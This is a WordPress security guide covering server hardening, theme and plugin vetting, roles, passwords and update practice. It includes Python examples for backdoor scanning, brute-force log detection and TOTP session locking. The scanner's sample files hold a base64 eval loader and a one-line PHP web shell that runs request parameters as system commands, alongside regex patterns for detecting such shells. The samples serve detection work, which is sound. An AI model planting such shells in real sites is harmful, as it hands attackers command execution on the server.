When building and managing a new WordPress site, the biggest temptation is to spend your first few months perfecting the design and content. But it is also vitally important that you keep security in mind from day one. You may think that a brand new website is no temptation to hackers. In practice, attackers scan the whole internet for WordPress installs, and a new one is attractive precisely because it is most likely to still have default settings, a lone admin account, no monitoring, and security measures that are not fully set up. They do not need your site to be popular: a compromised site is useful for hosting phishing pages, spam and malware on its own, and if it later takes off with real traffic or processes even one credit card purchase, the effort is rewarded again.
So as you build or establish your new WordPress site, let us help you take care of your primary WordPress security concerns. Join us today as we explore the basics of WordPress security. We will also discuss how to design a secure structure to keep your new site safe. And, of course, if your site isn’t so new but you’re concerned about security, this guide will be helpful to you, as well.
Web Server Security: Cover your Bases
All website security, WP or otherwise, starts with your server. However much of the cloud you use, a website still runs on a physical machine somewhere, and that machine and everything on it can be attacked. Responsibility is split: your hosting provider secures the hardware, the network and (on shared or virtual hosting) the hypervisor, while you are responsible for whatever you control. On a VPS that means the operating system, the web server, PHP and the database; on fully managed WordPress hosting it still means your accounts, themes and plugins. Malware, brute-force logins and exploitation of exposed services all arrive over the network, and that is the part you have to cover.
The basics of web server security are a firewall that exposes only the ports the site needs (443 for HTTPS, 80 only to redirect to HTTPS, and SSH restricted to your own addresses or reached through a bastion host), an operating system and web server that are kept patched, file-integrity or malware scanning of the document root, and TLS for every page, not just checkout and login. Management interfaces such as database consoles, phpMyAdmin and FTP should not be reachable from the internet at all. If you don’t know how to do these things, work with a web security service or MSP (managed (IT) service provider) to get them set up. Basic server security protects you from the attacks that hit any website, whether or not it is WordPress.
Research Secure Themes
If you’ve been looking into WordPress security, you may have already heard that some themes are riskier than others. In concept, themes are just layouts and visual designs that control how your pages look and how the site navigates. But those layouts are driven by code underneath: PHP template files plus HTML, CSS and JavaScript. The PHP runs on your server with the same privileges as WordPress itself, so a flaw in a theme (an unescaped input, an upload handler, an AJAX endpoint with no permission check) is a flaw in your site, and the JavaScript runs in every visitor’s browser. Whatever is inside that code becomes part of your attack surface the moment you install the theme.
Even worse, some themes are distributed with malware or back doors already built in. The usual carrier is a “nulled” copy of a paid theme, offered for free on a third-party site with the license check removed and, often, a backdoor or spam injector added. A site that installs one is compromised the moment the theme is activated.
Be extremely careful when choosing your themes. Install them only from the WordPress.org theme directory or directly from the vendor, never from a download site. Check that a theme is actively maintained (recent updates, a changelog, a reasonable number of active installs), and delete the themes you are not using rather than leaving them installed: an inactive theme’s PHP files are still on disk and still part of the code you have to keep patched.
Limit Yourself to Trustworthy Plugins
Plugins are easier to reason about. A plugin is, essentially, any extra code you add to make your website more fun, attractive or usable: a custom login page, user account handling, a live chat widget. Because it is code running inside WordPress with full access to your database and file system, an unsafe plugin exposes you to exactly the same problems as an unsafe theme. Plugins are also far more numerous than themes, more often abandoned by their authors, and just as often bundled with malware in nulled copies, and the large majority of published WordPress vulnerabilities are in plugins rather than in WordPress core.
Choose your plugins with great caution. Nothing can be “verified safe” in an absolute sense, so use the practical signals: prefer plugins from the official directory, check that they were updated recently and that any reported vulnerabilities were fixed, and install as few as you can, since every plugin is attack surface. Remove, rather than merely deactivate, the ones you stop using. And if a plugin fails those checks, don’t install it, no matter how tempting the new features might be.
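The theme and plugin checks above can be partly automated. As an added example (not code from the original article, and not a WordPress tool), the Python script below scans a theme or plugin directory for the constructs injected code relies on: eval() of a decoded blob, shell commands fed from request parameters, file writes driven by request input, and similar. The indicator list and the sample files are assumptions constructed for the demonstration; treat a hit as a prompt to read the file, not as a verdict.

```python
"""Heuristic scan of WordPress theme and plugin PHP files for backdoor indicators.

Added example, not code from the original article. The indicator patterns are
assumptions drawn from common injected-PHP idioms; a hit means "read this file",
not "this file is malicious". The sample files are constructed for the demo.
"""
import re
import tempfile
from pathlib import Path

# (indicator name, regex). Each is a construct that legitimate themes and
# plugins almost never need, but injected loaders and web shells rely on.
INDICATORS = [
    ("eval-of-decoded-blob",      # eval(base64_decode(...)), eval(gzinflate(...))
     re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("eval-of-request-input",     # eval($_POST['x'])
     re.compile(r"\beval\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("request-input-to-shell",    # system($_REQUEST['cmd']), a classic web shell
     re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("file-write-from-request",   # file_put_contents(..., $_POST[...]) dropper
     re.compile(r"\bfile_put_contents\s*\([^;]*\$_(GET|POST|REQUEST|FILES)\b", re.I)),
    ("preg_replace-e-modifier",   # /e made the replacement executable (pre-PHP 7 code)
     re.compile(r"\bpreg_replace\s*\(\s*['\"][^'\"]*?/[a-z]*e[a-z]*['\"]", re.I)),
    ("long-base64-literal",       # a big opaque blob embedded in source
     re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]")),
]


def scan_php_source(source: str, relpath: str = "<string>") -> list:
    """Return one finding dict per (line, indicator) match in a PHP source string."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                findings.append({"file": relpath, "line": lineno,
                                 "indicator": name, "snippet": line.strip()[:80]})
    return findings


def scan_tree(root) -> list:
    """Scan every .php file under root (e.g. wp-content/themes or wp-content/plugins)."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        findings.extend(scan_php_source(text, path.relative_to(root).as_posix()))
    return findings


# Constructed sample tree: one clean theme file, one "nulled" theme with an
# injected loader (the blob decodes to a one-line $_GET-driven system() call,
# typical of these loaders), and a web shell dropped into a plausible location.
SAMPLE_FILES = {
    "clean-theme/header.php":
        "<?php wp_head(); ?>\n<h1><?php bloginfo('name'); ?></h1>\n",
    "nulled-theme/functions.php":
        "<?php\n"
        "add_action('init', 'theme_setup');\n"
        "eval(base64_decode('aWYoaXNzZXQoJF9HRVRbJ2MnXSkpIHN5c3RlbSgkX0dFVFsnYyddKTs='));\n",
    "cache-plugin/wp-cache.php":
        "<?php if (isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); }\n",
}


def scan_samples() -> list:
    """Write the constructed samples to a temp dir, scan it, return the findings."""
    root = Path(tempfile.mkdtemp(prefix="wp-scan-"))
    for rel, content in SAMPLE_FILES.items():
        dest = root / rel
        dest.parent.mkdir(parents=True, exist_ok=True)
        dest.write_text(content, encoding="utf-8")
    return scan_tree(root)


if __name__ == "__main__":
    for f in scan_samples():
        print(f"{f['file']}:{f['line']}  {f['indicator']}  {f['snippet']}")
```

Run it against wp-content/themes and wp-content/plugins. For code that came from the WordPress.org directory, WP-CLI’s `wp plugin verify-checksums --all` and `wp core verify-checksums` compare the installed files against the published originals and catch modifications this heuristic would miss, so use both.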
Build the User Account Structure
Quick, before you have any users: spend a little time thinking carefully about user permissions and how you want them distributed, because they have a huge impact on how safe your website is. New accounts should have essentially no power on creation. WordPress gets this right out of the box: the default role for new users is Subscriber, which can edit its own profile and nothing else, and the “Anyone can register” option is off. Keep both that way unless your site genuinely needs self-registration. An attacker who creates an account to probe your site then has nothing to work with.
This, of course, leads you to the need for an account structure. Decide how account permissions will grow, and how accounts earn greater permissions such as publishing posts and editing pages. Every website uses a different system, from counting forum posts to voted reputation, and WordPress’s built-in ladder (Contributor, Author, Editor, Administrator) is a sensible starting point. Whatever you use, treat each promotion as a security decision: a role should be able to do only what that kind of user needs, and Administrator, which can install plugins and therefore run arbitrary code on the server, should be held by as few people as possible, each with their own named account.
Put Some Thought Into Passwords
No doubt you’ve heard a lot about password security, especially for WordPress sites, which are probed constantly simply because there are so many of them. Here’s what you really need to know about passwords: attackers run brute-force tools that guess at high speed, working through lists of leaked passwords and the patterns most people follow (a word, a capital letter, a number, a symbol at the end), and credential-stuffing tools that replay username and password pairs leaked from other sites.
So the best thing you can do for your site and account holders is to change how passwords work on your site. Long, random passwords are the place to start, and the only realistic way for people to use them is a password manager: it is the recommended solution, not a stop-gap, and WordPress’s own password generator produces exactly the kind of password a manager is meant to store. Here are some other things you can do:
Change Your Log-In URL
- This makes it a little harder for scanners to find the login form and cuts log noise. It is obscurity, not a defense: the same credentials can still be tried through xmlrpc.php and, with application passwords, the REST API, so pair it with rate limiting or a lockout after a few failed attempts.
Help Users Create Unusual Passwords
- Enforce a minimum length and reject passwords that appear in leaked-password lists. Passwords that defy normal patterns defeat the guessing tools, and length matters more than symbol rules.
Use Email Logins Instead of Usernames
- WordPress already accepts either an email address or a username on the login form, and neither is secret (usernames appear in author archive URLs, email addresses are widely known), so don’t count on this for much. What does help is never naming an account “admin” and turning on two-factor authentication for every account that can publish or change settings.
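To see why the login URL trick is no substitute for rate limiting, here is an added example, not from the original article, of what a brute-force run looks like in the web server’s access log and how to flag it. The log lines are constructed, the five-per-minute threshold is an assumption, and the script is illustrative detection logic rather than a WordPress plugin.

```python
"""Detect credential-guessing bursts against WordPress login endpoints.

Added example, not code from the original article. It reads web-server access
logs in the common "combined" format and flags any source that POSTs to a
login endpoint THRESHOLD or more times within WINDOW_SECONDS. The log lines,
window and threshold are constructed/assumed for the demonstration.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

WINDOW_SECONDS = 60
THRESHOLD = 5

# Everything that accepts a username and password, not just the visible form:
# xmlrpc.php takes credentials on every call, so a renamed login URL alone
# does nothing to stop a brute-force run aimed at it.
LOGIN_PATHS = {"/wp-login.php", "/xmlrpc.php"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return the fields we need from one combined-format line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],  # drop ?redirect_to=... etc.
        "status": int(m["status"]),
    }


def detect(lines, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return (flagged, suspicious_logins).

    flagged: ip -> timestamp at which it first reached the threshold.
    suspicious_logins: (ip, timestamp) for each wp-login.php success (302
    redirect) coming from an already-flagged ip, i.e. a guess that worked.
    """
    recent = defaultdict(deque)   # ip -> timestamps of recent login POSTs
    flagged = {}
    suspicious_logins = []
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST" or ev["path"] not in LOGIN_PATHS:
            continue
        ip, ts = ev["ip"], ev["ts"]
        # A failed wp-login.php attempt re-renders the form (200); success redirects (302).
        # xmlrpc.php answers 200 either way, so this signal exists only for wp-login.php.
        if ip in flagged and ev["path"] == "/wp-login.php" and ev["status"] == 302:
            suspicious_logins.append((ip, ts))
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window:   # sliding window
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged, suspicious_logins


# Constructed access log: a real user, a wp-login.php guessing run that ends
# in a successful login, and an xmlrpc.php run that bypasses any renamed login URL.
SAMPLE_LOG = """\
192.0.2.5 - - [10/Mar/2024:09:00:01 +0000] "GET /wp-login.php HTTP/1.1" 200 4512 "-" "Mozilla/5.0"
192.0.2.5 - - [10/Mar/2024:09:00:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.5 - - [10/Mar/2024:09:00:10 +0000] "GET /wp-admin/ HTTP/1.1" 200 61034 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:09:01:00 +0000] "POST /wp-login.php HTTP/1.1" 200 4520 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2024:09:01:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4520 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2024:09:01:04 +0000] "POST /wp-login.php HTTP/1.1" 200 4520 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2024:09:01:06 +0000] "POST /wp-login.php HTTP/1.1" 200 4520 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2024:09:01:08 +0000] "POST /wp-login.php HTTP/1.1" 200 4520 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2024:09:01:10 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.31"
198.51.100.20 - - [10/Mar/2024:09:02:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "-"
198.51.100.20 - - [10/Mar/2024:09:02:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "-"
198.51.100.20 - - [10/Mar/2024:09:02:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "-"
198.51.100.20 - - [10/Mar/2024:09:02:03 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "-"
198.51.100.20 - - [10/Mar/2024:09:02:04 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "-"
"""


def run_demo():
    """Run the detector over the constructed log."""
    return detect(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    flagged, suspicious = run_demo()
    for ip, ts in flagged.items():
        print(f"BLOCK {ip}: reached {THRESHOLD} login POSTs/{WINDOW_SECONDS}s at {ts.isoformat()}")
    for ip, ts in suspicious:
        print(f"ALERT {ip}: successful login after a guessing burst at {ts.isoformat()}")
```

Feed it your real access log (`detect(open("/var/log/nginx/access.log"))`) and block or rate-limit the flagged addresses at the firewall or web server, where the request never reaches PHP. The second return value is the more important one: a redirect on wp-login.php from an address that was guessing moments earlier means a password was found, and that account needs a reset and a look at what it did next.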
Idle Timeouts & Frustration-Free Re-Authentication
Another thing to think about is account security over the long term. Many people leave themselves logged in with a page open for days, or rely on their browser to log them in automatically. That exposes their accounts to risks in the physical world: anyone who borrows, finds or steals the device gets the account along with it. WordPress’s login cookie lasts two days by default and fourteen days with “Remember Me”, which is a long time for an administrator session on a laptop.
The best way to protect your account holders from this risk is to have logins time out automatically after a period of inactivity, and to expire every session after a fixed maximum age regardless of activity. Of course, you also don’t want to annoy your users by making them retype a long password over and over again, so pair the timeout with a low-friction second factor: a code from an authenticator app (TOTP) or a hardware security key, which is also the two-factor authentication you want on the initial login. Avoid security questions, picture passwords and spoken phrases as re-authentication methods; their answers are guessable or reusable, and they are weaker than the password they stand in for.
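As an added example, not WordPress code and not from the original article, the Python model below implements the policy this section argues for: a session locks after a period of inactivity, unlocks with a TOTP code from an authenticator app rather than a retyped password, and expires outright after a maximum age. The timeouts, the attempt limit and the unlock-with-second-factor-only design are assumptions; the TOTP routine follows RFC 6238 and checks out against its published test vectors.

```python
"""Idle and absolute session expiry with TOTP step-up to unlock.

Added example, not WordPress code and not from the original article: an
in-memory model of the policy the section describes. A session locks after
IDLE_TIMEOUT seconds without activity and can be unlocked with a TOTP code
(the password was already proven at login); it dies outright after
ABSOLUTE_TIMEOUT seconds and needs a full login. The timeouts and the attempt
limit are assumptions. WordPress itself keeps its login cookie for 2 days
(14 with "Remember Me"); that mechanism is not modelled here.
"""
import hashlib
import hmac
import secrets
import struct

IDLE_TIMEOUT = 15 * 60          # seconds of inactivity before the session locks
ABSOLUTE_TIMEOUT = 12 * 3600    # hard cap on session age, activity or not
MAX_UNLOCK_ATTEMPTS = 5         # wrong codes before the locked session is destroyed
TOTP_STEP = 30                  # RFC 6238 time step in seconds


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: dynamic truncation of HMAC-SHA1(secret, counter)."""
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, now: float, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP over the current 30-second time step."""
    return hotp(secret, int(now) // TOTP_STEP, digits)


def verify_totp(secret: bytes, code: str, now: float, window: int = 1):
    """Return the time-step counter the code matches (allowing +/- window steps
    of clock drift) or None. The comparison is constant-time."""
    current = int(now) // TOTP_STEP
    for counter in range(current - window, current + window + 1):
        if hmac.compare_digest(hotp(secret, counter), code):
            return counter
    return None


class SessionStore:
    def __init__(self, idle=IDLE_TIMEOUT, absolute=ABSOLUTE_TIMEOUT):
        self.idle, self.absolute = idle, absolute
        self._sessions = {}

    def create(self, user: str, now: float) -> str:
        """Called after a full password (+ second factor) login."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "created": now, "last_seen": now,
                               "locked": False, "failed_unlocks": 0,
                               "last_totp_counter": -1}
        return sid

    def touch(self, sid: str, now: float) -> str:
        """Record activity; returns 'active', 'locked', 'expired' or 'unknown'."""
        s = self._sessions.get(sid)
        if s is None:
            return "unknown"
        if now - s["created"] > self.absolute:
            del self._sessions[sid]          # too old: full login required
            return "expired"
        if s["locked"]:
            return "locked"
        if now - s["last_seen"] > self.idle:
            s["locked"] = True               # keep the session, demand step-up
            return "locked"
        s["last_seen"] = now
        return "active"

    def unlock(self, sid: str, totp_secret: bytes, code: str, now: float) -> bool:
        """Unlock an idle-locked session with a fresh TOTP code."""
        s = self._sessions.get(sid)
        if s is None:
            return False
        if now - s["created"] > self.absolute:
            del self._sessions[sid]
            return False
        matched = verify_totp(totp_secret, code, now)
        # Reject wrong codes and replays of a code already accepted for this session.
        if matched is None or matched <= s["last_totp_counter"]:
            s["failed_unlocks"] += 1
            if s["failed_unlocks"] >= MAX_UNLOCK_ATTEMPTS:
                del self._sessions[sid]      # give up; full login required
            return False
        s.update(locked=False, failed_unlocks=0, last_totp_counter=matched, last_seen=now)
        return True
```

The design choice worth noting is that the idle lock keeps the session and asks only for the second factor, because the password was already proven within the absolute window, while the absolute timeout destroys the session and demands the full login. The store also refuses a code that has already been accepted once, which is what stops someone who watched a code being typed from reusing it, and it destroys the session after a handful of wrong codes so the lock screen cannot be brute-forced.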
Be Prepared to Update Themes and Plugins
Finally, remember that security is an ongoing process. One of the biggest risks for existing WordPress sites is letting WordPress itself, the themes and the plugins fall out of date. Over time, security holes are discovered and patches are written to close them, and once a fix is published, attackers read it too and scan for sites that have not applied it, often within days.
This is why updates need to be applied promptly, within days of release for security fixes, not once a year. WordPress can update itself automatically, and since version 5.5 it can auto-update plugins and themes individually; turn that on for everything that is not custom or fragile, keep a backup you have actually restored from, and test larger updates on a staging copy first. Remove plugins and themes whose authors have stopped updating them, because no fix is coming for those.
Are you planning to build a new WordPress site or have recently put one together? If you’re not sure how to enact these WordPress security basics or would like more information about how to make sure your website is safe from every vector of hacker attack, contact us today!